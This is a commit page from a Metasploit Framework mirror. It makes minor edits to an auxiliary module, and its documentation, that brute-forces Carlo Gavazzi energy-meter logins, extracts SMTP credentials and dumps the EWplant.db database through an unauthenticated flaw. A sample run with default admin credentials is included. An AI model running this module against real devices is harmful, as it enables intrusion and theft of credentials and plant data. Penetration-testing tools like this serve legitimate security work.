infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Minor edits

bug/bundler_fix
juushya 2017-03-03 00:53:17 +05:30
parent c9a354b844
commit 6bd09c142f
2 changed files with 9 additions and 13 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
documentation/modules/auxiliary/scanner/http/gavazzi_em_login_loot.md
View File

@ -1,6 +1,6 @@
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db . This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics.
Vulnerable firmware versions include:
@ -27,9 +27,9 @@ msf auxiliary(gavazzi_em_login_loot) > run
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "admin":"admin"
[+] 1.3.3.7:80 - Firmware version A8_U03...
[+] 1.3.3.7:80 - SMTP server: "", SMTP username: "", SMTP password: ""
[*] 1.3.3.7 - dumping EWplant.db
[*] 1.3.3.7:80 - dumping EWplant.db
[+] 1.3.3.7:80 - EWplant.db retrieved successfully!
[+] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000005_moduletest_1.3.3.7_EWplant.db_501578.bin
[+] 1.3.3.7:80 - File saved in: /root/.msf4/loot/20000000000005_moduletest_1.3.3.7_EWplant.db_501578.db
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

16
modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb
View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary
super(update_info(info,
'Name' => 'Carlo Gavazzi Energy Meters - Login Brute Force, Extract Info and Dump Plant Database',
'Description' => %{
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db . This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.
This module scans for Carlo Gavazzi Energy Meters login portals, performs a login brute force attack, enumerates device firmware version, and attempt to extract the SMTP configuration. A valid, admin privileged user is required to extract the SMTP password. In some older firmware versions, the SMTP config can be retrieved without any authentication. The module also exploits an access control vulnerability which allows an unauthenticated user to remotely dump the database file EWplant.db. This db file contains information such as power/energy utilization data, tariffs, and revenue statistics. Vulnerable firmware versions include - VMU-C EM prior to firmware Version A11_U05 and VMU-C PV prior to firmware Version A17.
},
'References' =>
[
@ -258,16 +258,12 @@ class MetasploitModule < Msf::Auxiliary
end
if res && res.code == 200
print_status("#{rhost} - dumping EWplant.db")
print_status("#{rhost}:#{rport} - dumping EWplant.db")
print_good("#{rhost}:#{rport} - EWplant.db retrieved successfully!")
path = store_loot(
'EWplant.db',
'SQLite_db/text',
rhost,
res.body,
rport,
'Carlo Gavazzi Energy Meter - EWplant.db'
)
loot_name = 'EWplant.db'
loot_type = 'SQLite_db/text'
loot_desc = 'Carlo Gavazzi EM - EWplant.db'
path = store_loot(loot_name, loot_type, datastore['RHOST'], res.body , loot_desc)
print_good("#{rhost}:#{rport} - File saved in: #{path}")
else
vprint_error("#{rhost}:#{rport} - Failed to retrieve EWplant.db. Set a higher HTTPCLIENTTIMEOUT and try again. Else, check if target is running vulnerable version.?")